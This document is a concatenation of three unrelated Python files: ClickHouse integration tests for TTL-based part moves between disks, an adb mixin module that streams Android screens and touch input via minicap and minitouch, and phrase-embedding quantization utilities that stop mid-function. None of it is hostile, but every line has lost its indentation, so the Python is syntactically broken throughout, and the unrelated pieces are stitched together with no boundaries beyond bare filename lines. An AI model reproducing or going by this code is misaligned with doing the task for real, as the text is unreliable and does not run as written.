data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
node1.query("DROP TABLE {}".format(name_temp))
time.sleep(2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name_temp))
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_merges_to_disk_do_not_work","MergeTree()",0),
("replicated_mt_test_merges_to_disk_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_do_not_work', '1')",0),
("mt_test_merges_to_disk_work","MergeTree()",1),
("replicated_mt_test_merges_to_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_to_disk_work', '1')",1),
])
def test_merges_to_disk_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
node1.query("SYSTEM STOP MERGES {}".format(name))
node1.query("SYSTEM STOP MOVES {}".format(name))
wait_expire_1 = 10
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 16MB in total
for i in range(8):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
node1.query("SYSTEM START MERGES {}".format(name))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "16"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("mt_test_merges_with_full_disk_work","MergeTree()"),
("replicated_mt_test_merges_with_full_disk_work","ReplicatedMergeTree('/clickhouse/replicated_test_merges_with_full_disk_work', '1')"),
])
def test_merges_with_full_disk_work(started_cluster, name, engine):
try:
name_temp = name + "_temp"
node1.query("""
CREATE TABLE {name} (
s1 String
) ENGINE = MergeTree()
ORDER BY tuple()
SETTINGS storage_policy='only_jbod2'
""".format(name=name_temp))
data = [] # 35MB in total
for i in range(35):
data.append(get_random_string(1024 * 1024)) # 1MB row
node1.query("INSERT INTO {} VALUES {}".format(name_temp, ",".join(["('" + x + "')" for x in data])))
used_disks = get_used_disks_for_table(node1, name_temp)
assert set(used_disks) == {"jbod2"}
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'jbod2'
SETTINGS storage_policy='jbod1_with_jbod2'
""".format(name=name, engine=engine))
wait_expire_1 = 10
time_1 = time.time() + wait_expire_1
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 12MB in total
for i in range(6):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "2" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"} # Merged to the same disk against the rule.
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "12"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name_temp))
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_moves_after_merges_do_not_work","MergeTree()",0),
("replicated_mt_test_moves_after_merges_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_do_not_work', '1')",0),
("mt_test_moves_after_merges_work","MergeTree()",1),
("replicated_mt_test_moves_after_merges_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_merges_work', '1')",1),
])
def test_moves_after_merges_work(started_cluster, name, engine, positive):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
wait_expire_1 = 10
wait_expire_2 = 4
time_1 = time.time() + wait_expire_1
time_2 = time.time() + wait_expire_1 + wait_expire_2
wait_expire_1_thread = threading.Thread(target=time.sleep, args=(wait_expire_1,))
wait_expire_1_thread.start()
for _ in range(2):
data = [] # 14MB in total
for i in range(7):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time_1 if i > 0 or positive else time_2))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
node1.query("OPTIMIZE TABLE {}".format(name))
time.sleep(1)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1"}
assert "1" == node1.query("SELECT count() FROM system.parts WHERE table = '{}' AND active = 1".format(name)).strip()
wait_expire_1_thread.join()
time.sleep(wait_expire_2/2)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external" if positive else "jbod1"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "14"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive,bar", [
("mt_test_moves_after_alter_do_not_work","MergeTree()",0,"DELETE"),
("replicated_mt_test_moves_after_alter_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')",0,"DELETE"),
("mt_test_moves_after_alter_work","MergeTree()",1,"DELETE"),
("replicated_mt_test_moves_after_alter_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')",1,"DELETE"),
("mt_test_moves_after_alter_do_not_work","MergeTree()",0,"TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_do_not_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_do_not_work', '1')",0,"TO DISK 'external'"),
("mt_test_moves_after_alter_work","MergeTree()",1,"TO DISK 'external'"),
("replicated_mt_test_moves_after_alter_work","ReplicatedMergeTree('/clickhouse/replicated_test_moves_after_alter_work', '1')",1,"TO DISK 'external'"),
])
def test_ttls_do_not_work_after_alter(started_cluster, name, engine, positive, bar):
try:
node1.query("""
CREATE TABLE {name} (
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
TTL d1 TO DISK 'external'
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name, engine=engine))
if positive:
node1.query("""
ALTER TABLE {name}
MODIFY TTL
d1 + INTERVAL 15 MINUTE {bar}
""".format(name=name, bar=bar)) # That shall disable TTL.
data = [] # 10MB in total
for i in range(10):
data.append(("'{}'".format(get_random_string(1024 * 1024)), "toDateTime({})".format(time.time()-1))) # 1MB row
node1.query("INSERT INTO {} (s1, d1) VALUES {}".format(name, ",".join(["(" + ",".join(x) + ")" for x in data])))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod1" if positive else "external"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).strip() == "10"
finally:
node1.query("DROP TABLE IF EXISTS {}".format(name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine,positive", [
("mt_test_alter_multiple_ttls_positive", "MergeTree()", True),
("mt_replicated_test_alter_multiple_ttls_positive", "ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_positive', '1')", True),
("mt_test_alter_multiple_ttls_negative", "MergeTree()", False),
("mt_replicated_test_alter_multiple_ttls_negative", "ReplicatedMergeTree('/clickhouse/replicated_test_alter_multiple_ttls_negative', '1')", False),
])
def test_alter_multiple_ttls(started_cluster, name, engine, positive):
"""Copyright 2019, Altinity LTD
Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
"""Check that when multiple TTL expressions are set
and before any parts are inserted the TTL expressions
are changed with ALTER command then all old
TTL expressions are removed and the
the parts are moved to the specified disk or volume or
deleted if the new TTL expression is triggered
and are not moved or deleted when it is not.
"""
now = time.time()
try:
node1.query("""
CREATE TABLE {name} (
p1 Int64,
s1 String,
d1 DateTime
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY p1
TTL d1 + INTERVAL 30 SECOND TO DISK 'jbod2',
d1 + INTERVAL 60 SECOND TO VOLUME 'external'
SETTINGS storage_policy='jbods_with_external', merge_with_ttl_timeout=0
""".format(name=name, engine=engine))
node1.query("""
ALTER TABLE {name} MODIFY
TTL d1 + INTERVAL 0 SECOND TO DISK 'jbod2',
d1 + INTERVAL 5 SECOND TO VOLUME 'external',
d1 + INTERVAL 10 SECOND DELETE
""".format(name=name))
for p in range(3):
data = [] # 6MB in total
now = time.time()
for i in range(2):
p1 = p
s1 = get_random_string(1024 * 1024) # 1MB
d1 = now - 1 if i > 0 or positive else now + 300
data.append("({}, '{}', toDateTime({}))".format(p1, s1, d1))
node1.query("INSERT INTO {name} (p1, s1, d1) VALUES {values}".format(name=name, values=",".join(data)))
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"jbod2"} if positive else {"jbod1", "jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
time.sleep(5)
used_disks = get_used_disks_for_table(node1, name)
assert set(used_disks) == {"external"} if positive else {"jbod1", "jbod2"}
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["6"]
time.sleep(5)
node1.query("OPTIMIZE TABLE {name} FINAL".format(name=name))
assert node1.query("SELECT count() FROM {name}".format(name=name)).splitlines() == ["0"] if positive else ["3"]
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,engine", [
("concurrently_altering_ttl_mt","MergeTree()"),
("concurrently_altering_ttl_replicated_mt","ReplicatedMergeTree('/clickhouse/concurrently_altering_ttl_replicated_mt', '1')",),
])
def test_concurrent_alter_with_ttl_move(started_cluster, name, engine):
try:
node1.query("""
CREATE TABLE {name} (
EventDate Date,
number UInt64
) ENGINE = {engine}
ORDER BY tuple()
PARTITION BY toYYYYMM(EventDate)
SETTINGS storage_policy='jbods_with_external'
""".format(name=name, engine=engine))
values = list({ random.randint(1, 1000000) for _ in range(0, 1000) })
def insert(num):
for i in range(num):
day = random.randint(11, 30)
value = values.pop()
month = '0' + str(random.choice([3, 4]))
node1.query("INSERT INTO {} VALUES(toDate('2019-{m}-{d}'), {v})".format(name, m=month, d=day, v=value))
def alter_move(num):
def produce_alter_move(node, name):
move_type = random.choice(["PART", "PARTITION"])
if move_type == "PART":
for _ in range(10):
try:
parts = node1.query("SELECT name from system.parts where table = '{}' and active = 1".format(name)).strip().split('\n')
break
except QueryRuntimeException:
pass
else:
raise Exception("Cannot select from system.parts")
move_part = random.choice(["'" + part + "'" for part in parts])
else:
move_part = random.choice([201903, 201904])
move_disk = random.choice(["DISK", "VOLUME"])
if move_disk == "DISK":
move_volume = random.choice(["'external'", "'jbod1'", "'jbod2'"])
else:
move_volume = random.choice(["'main'", "'external'"])
try:
node1.query("ALTER TABLE {} MOVE {mt} {mp} TO {md} {mv}".format(
name, mt=move_type, mp=move_part, md=move_disk, mv=move_volume))
except QueryRuntimeException as ex:
pass
for i in range(num):
produce_alter_move(node1, name)
def alter_update(num):
for i in range(num):
node1.query("ALTER TABLE {} UPDATE number = number + 1 WHERE 1".format(name))
def alter_modify_ttl(num):
for i in range(num):
ttls = []
for j in range(random.randint(1, 10)):
what = random.choice(["TO VOLUME 'main'", "TO VOLUME 'external'", "TO DISK 'jbod1'", "TO DISK 'jbod2'", "TO DISK 'external'"])
when = "now()+{}".format(random.randint(-1, 5))
ttls.append("{} {}".format(when, what))
node1.query("ALTER TABLE {} MODIFY TTL {}".format(name, ", ".join(ttls)))
def optimize_table(num):
for i in range(num):
node1.query("OPTIMIZE TABLE {} FINAL".format(name))
p = Pool(15)
tasks = []
for i in range(5):
tasks.append(p.apply_async(insert, (100,)))
tasks.append(p.apply_async(alter_move, (100,)))
tasks.append(p.apply_async(alter_update, (100,)))
tasks.append(p.apply_async(alter_modify_ttl, (100,)))
tasks.append(p.apply_async(optimize_table, (100,)))
for task in tasks:
task.get(timeout=120)
assert node1.query("SELECT 1") == "1\n"
assert node1.query("SELECT COUNT() FROM {}".format(name)) == "500\n"
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
@pytest.mark.skip(reason="Flappy test")
@pytest.mark.parametrize("name,positive", [
("test_double_move_while_select_negative", 0),
("test_double_move_while_select_positive", 1),
])
def test_double_move_while_select(started_cluster, name, positive):
try:
node1.query("""
CREATE TABLE {name} (
n Int64,
s String
) ENGINE = MergeTree
ORDER BY tuple()
PARTITION BY n
SETTINGS storage_policy='small_jbod_with_external'
""".format(name=name))
node1.query("INSERT INTO {name} VALUES (1, '{string}')".format(name=name, string=get_random_string(10 * 1024 * 1024)))
parts = node1.query("SELECT name FROM system.parts WHERE table = '{name}' AND active = 1".format(name=name)).splitlines()
assert len(parts) == 1
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'external'".format(name=name, part=parts[0]))
def long_select():
if positive:
node1.query("SELECT sleep(3), sleep(2), sleep(1), n FROM {name}".format(name=name))
thread = threading.Thread(target=long_select)
thread.start()
node1.query("ALTER TABLE {name} MOVE PART '{part}' TO DISK 'jbod1'".format(name=name, part=parts[0]))
        # Fill jbod1 to force ClickHouse to move partition 1 to the 'external' disk.
node1.query("INSERT INTO {name} VALUES (2, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query("INSERT INTO {name} VALUES (3, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
node1.query("INSERT INTO {name} VALUES (4, '{string}')".format(name=name, string=get_random_string(9 * 1024 * 1024)))
# If SELECT locked old part on external, move shall fail.
assert node1.query("SELECT disk_name FROM system.parts WHERE table = '{name}' AND active = 1 AND name = '{part}'"
.format(name=name, part=parts[0])).splitlines() == ["jbod1" if positive else "external"]
thread.join()
assert node1.query("SELECT n FROM {name} ORDER BY n".format(name=name)).splitlines() == ["1", "2", "3", "4"]
finally:
node1.query("DROP TABLE IF EXISTS {name}".format(name=name))
|
mixins.py
|
# -*- coding: utf-8 -*-
# Mixin classes.
# Use extra resources to enhance the original adb device.
# The interface class should have a raw_cmd method with a signature
# as follows:
#
#   def raw_cmd(self, *args, **kwargs):
#       ...
#       return subprocess.Popen(...)
#
# where `args` are the adb command arguments and `kwargs` are
# subprocess keyword arguments.
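#
# For example (an illustrative sketch only, mirroring how the mixins below
# call raw_cmd; `device` is a placeholder instance):
#
#   out = device.raw_cmd('shell', 'pm', 'list', 'packages',
#                        stdout=subprocess.PIPE).communicate()[0]
#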
import os
import Queue
import re
import socket
import struct
import subprocess
import threading
import time
import traceback
__dir__ = os.path.dirname(os.path.abspath(__file__))
class RotationWatcherMixin(object):
__rotation = 0
__watcher_process = None
def open_rotation_watcher(self, on_rotation_change=None):
package_name = 'jp.co.cyberagent.stf.rotationwatcher'
out = self.raw_cmd('shell', 'pm', 'list', 'packages', stdout=subprocess.PIPE).communicate()[0]
if package_name not in out:
apkpath = os.path.join(__dir__, '..', 'vendor', 'RotationWatcher.apk')
print 'install rotationwatcher...', apkpath
if 0 != self.raw_cmd('install', '-rt', apkpath).wait():
print 'install rotationwatcher failed.'
return
if self.__watcher_process is not None:
self.__watcher_process.kill()
out = self.raw_cmd('shell', 'pm', 'path', package_name, stdout=subprocess.PIPE).communicate()[0]
path = out.strip().split(':')[-1]
p = self.raw_cmd('shell',
'CLASSPATH="%s"' % path,
'app_process',
'/system/bin',
'jp.co.cyberagent.stf.rotationwatcher.RotationWatcher',
stdout=subprocess.PIPE)
self.__watcher_process = p
queue = Queue.Queue()
def _pull():
while True:
line = p.stdout.readline().strip()
if not line:
if p.poll() is not None:
print 'rotationwatcher stopped'
break
continue
queue.put(line)
t = threading.Thread(target=_pull)
t.setDaemon(True)
t.start()
def listener(value):
try:
self.__rotation = int(value)/90
except:
return
if callable(on_rotation_change):
on_rotation_change(self.__rotation)
def _listen():
while True:
try:
time.sleep(0.005)
line = queue.get_nowait()
listener(line)
except Queue.Empty:
if p.poll() is not None:
break
continue
except:
traceback.print_exc()
t = threading.Thread(target=_listen)
t.setDaemon(True)
t.start()
def str2img(jpgstr, orientation=None):
import numpy as np
import cv2
arr = np.fromstring(jpgstr, np.uint8)
img = cv2.imdecode(arr, cv2.IMREAD_COLOR)
if orientation == 1:
return cv2.flip(cv2.transpose(img), 0) # counter-clockwise
if orientation == 3:
return cv2.flip(cv2.transpose(img), 1) # clockwise
return img
class MinicapStreamMixin(object):
__screen = None
__minicap_process = None
def __install_minicap(self):
# install minicap & minitouch
os.system('python -m atx minicap')
def open_minicap_stream(self, port=1313):
# ensure minicap installed
out = self.raw_cmd('shell', 'ls', '"/data/local/tmp/minicap"', stdout=subprocess.PIPE).communicate()[0]
if 'No such file or directory' in out:
self.__install_minicap()
if self.__minicap_process is not None:
self.__minicap_process.kill()
# if minicap is already started, kill it first.
out = self.raw_cmd('shell', 'ps', '-C', '/data/local/tmp/minicap', stdout=subprocess.PIPE).communicate()[0]
out = out.strip().split('\n')
if len(out) > 1:
idx = out[0].split().index('PID')
pid = out[1].split()[idx]
print 'minicap is running, killing', pid
self.raw_cmd('shell', 'kill', '-9', pid).wait()
# start minicap
out = self.raw_cmd('shell', 'LD_LIBRARY_PATH=/data/local/tmp', '/data/local/tmp/minicap', '-i',
stdout=subprocess.PIPE).communicate()[0]
m = re.search('"width": (\d+).*"height": (\d+).*"rotation": (\d+)', out, re.S)
w, h, r = map(int, m.groups())
w, h = min(w, h), max(w, h)
params = '{x}x{y}@{x}x{y}/{r}'.format(x=w, y=h, r=r)
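        # Assumed meaning of minicap's -P option: {real WxH}@{virtual WxH}/{rotation in degrees};
        # here the real and virtual sizes are kept equal.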
print 'starting minicap', params
p = self.raw_cmd('shell',
'LD_LIBRARY_PATH=/data/local/tmp',
'/data/local/tmp/minicap',
'-P %s' % params,
'-S',
stdout=subprocess.PIPE)
self.__minicap_process = p
time.sleep(0.5)
# forward to tcp port
self.raw_cmd('forward', 'tcp:%s' % port, 'localabstract:minicap').wait()
queue = Queue.Queue()
# pull data from socket
def _pull():
# print 'start pull', p.pid, p.poll()
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
try:
assert p.poll() is None
s.connect(('127.0.0.1', port))
t = s.recv(24)
print 'minicap connected', struct.unpack('<2B5I2B', t)
while True:
frame_size = struct.unpack("<I", s.recv(4))[0]
trunks = []
recvd_size = 0
while recvd_size < frame_size:
trunk_size = min(8192, frame_size-recvd_size)
d = s.recv(trunk_size)
trunks.append(d)
recvd_size += len(d)
queue.put(''.join(trunks))
except Exception as e:
if not isinstance(e, struct.error):
traceback.print_exc()
if p.poll() is not None:
print 'Process died.'
print p.stdout.read()
else:
                    print 'stopping minicap ...'
p.kill()
finally:
s.close()
self.raw_cmd('forward', '--remove', 'tcp:%s' % port).wait()
t = threading.Thread(target=_pull)
t.setDaemon(True)
t.start()
out = self.raw_cmd('shell', 'getprop', 'ro.build.version.sdk', stdout=subprocess.PIPE).communicate()[0]
sdk = int(out.strip())
orientation = r/90
def _listen():
while True:
try:
time.sleep(0.005)
frame = queue.get_nowait()
if sdk <= 16:
img = str2img(frame, orientation)
else:
img = str2img(frame)
self.__screen = img
except Queue.Empty:
if p.poll() is not None:
print 'minicap died'
print p.stdout.read()
break
continue
except:
traceback.print_exc()
t = threading.Thread(target=_listen)
t.setDaemon(True)
t.start()
def screenshot_cv2(self):
return self.__screen
class MinitouchStreamMixin(object):
__touch_queue = None
__minitouch_process = None
def __install_minitouch(self):
# install minicap & minitouch
os.system('python -m atx minicap')
def open_minitouch_stream(self, port=1111):
if self.__touch_queue is None:
self.__touch_queue = Queue.Queue()
# ensure minicap installed
out = self.raw_cmd('shell', 'ls', '"/data/local/tmp/minitouch"', stdout=subprocess.PIPE).communicate()[0]
if 'No such file or directory' in out:
self.__install_minitouch()
if self.__minitouch_process is not None:
self.__minitouch_process.kill()
out = self.raw_cmd('shell', 'ps', '-C', '/data/local/tmp/minitouch', stdout=subprocess.PIPE).communicate()[0]
out = out.strip().split('\n')
if len(out) > 1:
p = None
else:
p = self.raw_cmd('shell', '/data/local/tmp/minitouch')
time.sleep(1)
if p.poll() is not None:
print 'start minitouch failed.'
return
self.__minitouch_process = p
self.raw_cmd('forward', 'tcp:%s' % port, 'localabstract:minitouch').wait()
def send():
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
try:
s.connect(('127.0.0.1', port))
while True:
cmd = self.__touch_queue.get() # wait here
if not cmd:
continue
elif cmd[-1] != '\n':
cmd += '\n'
s.send(cmd)
except:
traceback.print_exc()
finally:
s.close()
self.raw_cmd('forward', '--remove', 'tcp:%s' % port).wait()
t = threading.Thread(target=send)
t.setDaemon(True)
t.start()
def click(self, x, y):
cmd = 'd 0 %d %d 30\nc\nu 0\nc\n' % (int(x), int(y))
self.__touch_queue.put(cmd)
def swipe(self, sx, sy, ex, ey, steps=20):
        x1, y1, x2, y2 = map(int, (sx, sy, ex, ey))
        dx = (x2-x1)/steps
        dy = (y2-y1)/steps
        send = self.__touch_queue.put
send('d 0 %d %d 30\nc\n' % (x1, y1))
for i in range(steps-1):
x, y = x1+(i+1)*dx, y1+(i+1)*dy
send('m 0 %d %d 30\nc\n' % (x, y))
send('u 0 %d %d 30\nc\nu 0\nc\n' % (x2, y2))
def pinchin(self, x1, y1, x2, y2, steps=10):
pass
def pinchout(self, x1, y1, x2, y2, steps=10):
pass
class OpenSTFServiceMixin(object):
pass
#-------------- examples ----------------#
class DummyDevice(object):
def raw_cmd(self, *args, **kwargs):
cmds = ['adb'] + list(args)
print cmds
return subprocess.Popen(cmds, **kwargs)
# Mixins should come first in the MRO so that they override methods of the base device class.
class TestDevice(MinitouchStreamMixin, MinicapStreamMixin, RotationWatcherMixin, DummyDevice):
def __init__(self, *args, **kwargs):
super(self.__class__, self).__init__(*args, **kwargs)
self.open_rotation_watcher(on_rotation_change=lambda v: self.open_minicap_stream())
self.open_minitouch_stream()
if __name__ == '__main__':
import cv2
dev = TestDevice()
while True:
img = dev.screenshot_cv2()
if img is not None:
cv2.imshow('screen', img)
cv2.waitKey(10)
|
embed_utils.py
|
""" Very heavily inspired by the official evaluation script for SQuAD version 2.0 which was
modified by XLNet authors to update `find_best_threshold` scripts for SQuAD V2.0
In addition to basic functionality, we also compute additional statistics and
plot precision-recall curves if an additional na_prob.json file is provided.
This file is expected to map question ID's to the model's predicted probability
that a question is unanswerable.
"""
import collections
import json
import logging
import math
import re
import string
import tqdm
import h5py
import numpy as np
import torch
from multiprocessing import Queue, Process
from threading import Thread
from time import time
from tqdm import tqdm
from transformers.tokenization_bert import BasicTokenizer
from .squad_utils import QuestionResult, SquadResult
from .squad_metrics import get_final_text_
logger = logging.getLogger(__name__)
# For debugging
quant_stat = {}
b_quant_stat = {}
id2example = None
def get_metadata(features, results, max_answer_length, do_lower_case, tokenizer, verbose_logging, has_title):
global id2example
# Get rid of titles + save start only (as start and end are shared)
roberta_add = 1 if "roberta" in str(type(tokenizer)) else 0
toffs = [(f.input_ids.index(tokenizer.sep_token_id))*int(has_title) + roberta_add for f in features]
# Filter reps
fs = np.concatenate(
[result.sft_logits[to+1:len(feature.tokens) - 1] for feature, result, to in zip(features, results, toffs)], axis=0
)
fe = np.concatenate(
[result.eft_logits[to+1:len(feature.tokens) - 1] for feature, result, to in zip(features, results, toffs)], axis=0
)
if max_answer_length is None:
example = id2example[features[-1].unique_id]
metadata = {
'did': example.doc_idx, 'title': example.title,
'filter_start': fs, 'filter_end': fe
}
return metadata
# start vectors
start = np.concatenate(
[result.start_vecs[to+1:len(feature.tokens) - 1] for feature, result, to in zip(features, results, toffs)],
axis=0
)
len_per_para = [len(f.input_ids[to+1:len(f.tokens)-1]) for to, f in zip(toffs, features)]
curr_size = 0
# Start2end map
start2end = -1 * np.ones([np.shape(start)[0], max_answer_length], dtype=np.int32)
idx = 0
for feature, result, to in zip(features, results, toffs):
for i in range(to+1, len(feature.tokens) - 1):
for j in range(i, min(i + max_answer_length, len(feature.tokens) - 1)):
start2end[idx, j - i] = idx + j - i
idx += 1
word2char_start = np.zeros([start.shape[0]], dtype=np.int32)
word2char_end = np.zeros([start.shape[0]], dtype=np.int32)
# Orig map
sep = ' [PAR] '
full_text = ""
prev_example = None
word_pos = 0
for feature, to in zip(features, toffs):
example = id2example[feature.unique_id]
if prev_example is not None and feature.span_idx == 0:
full_text = full_text + ' '.join(prev_example.doc_tokens) + sep
for i in range(to+1, len(feature.tokens) - 1):
_, start_pos, _ = get_final_text_(example, feature, i, min(len(feature.tokens) - 2, i + 1), do_lower_case,
tokenizer, verbose_logging)
_, _, end_pos = get_final_text_(example, feature, max(to+1, i - 1), i, do_lower_case,
tokenizer, verbose_logging)
start_pos += len(full_text)
end_pos += len(full_text)
word2char_start[word_pos] = start_pos
word2char_end[word_pos] = end_pos
word_pos += 1
prev_example = example
full_text = full_text + ' '.join(prev_example.doc_tokens)
metadata = {
'did': prev_example.doc_idx, 'context': full_text, 'title': prev_example.title,
'start': start, 'start2end': start2end,
'word2char_start': word2char_start, 'word2char_end': word2char_end,
'filter_start': fs, 'filter_end': fe, 'len_per_para': len_per_para
}
return metadata
def filter_metadata(metadata, threshold):
start_idxs, = np.where(metadata['filter_start'] > threshold)
end_idxs, = np.where(metadata['filter_end'] > threshold)
all_idxs = np.array(sorted(list(set(np.concatenate([start_idxs, end_idxs])))))
end_long2short = {long: short for short, long in enumerate(all_idxs) if long in end_idxs} # fixed for end_idx
# print(all_idxs)
# print(end_long2short)
if len(all_idxs) == 0:
all_idxs = np.where(metadata['filter_start'] > -999999)[0][:1] # just get all
end_long2short = {long: short for short, long in enumerate(all_idxs)}
print('all idxs were filtered, so use only one vector for this:', len(all_idxs))
metadata['start'] = metadata['start'][all_idxs] # union of start/end
metadata['f2o_start'] = all_idxs
metadata['start2end'] = metadata['start2end'][all_idxs]
# print(metadata['start2end'])
for i, each in enumerate(metadata['start2end']):
for j, long in enumerate(each.tolist()):
metadata['start2end'][i, j] = end_long2short[long] if long in end_long2short else -1
# print(metadata['start2end'])
return metadata
def float_to_int8(num, offset, factor):
out = (num - offset) * factor
out = out.clip(-128, 127)
out = np.round(out).astype(np.int8)
return out
def int8_to_float(num, offset, factor):
return num.astype(np.float32) / factor + offset
def float_to_int4(num, offset=-3.5, factor=2.3):
out = (num - offset) * factor
out = out.clip(0, 16)
out = np.round(out).astype(np.uint8)
hd = out.shape[1] // 2
merged = out[:,:hd] * 16 + out[:,hd:]
merged = merged.clip(0, 255)
return merged
def int4_to_float(num, offset=-3.5, factor=2.3):
unmerged = np.concatenate((num // 16, num % 16), axis=1)
return unmerged.astype(np.float32) / factor + offset
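# Illustrative sketch (not used elsewhere in this module): round-tripping a
# vector through the int8 quantization helpers above. The offset/scale values
# are placeholders chosen for the example, not values mandated by the model.
def _int8_roundtrip_example(offset=-2.0, scale=20.0):
    x = np.array([[-1.5, 0.0, 2.3]], dtype=np.float32)
    q = float_to_int8(x, offset, scale)       # quantize to int8
    x_hat = int8_to_float(q, offset, scale)   # dequantize back to float32
    return np.abs(x - x_hat).max()            # small reconstruction error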
def compress_metadata(metadata, dense_offset, dense_scale):
for key in ['start']:
if key in metadata:
'''
if key == 'start':
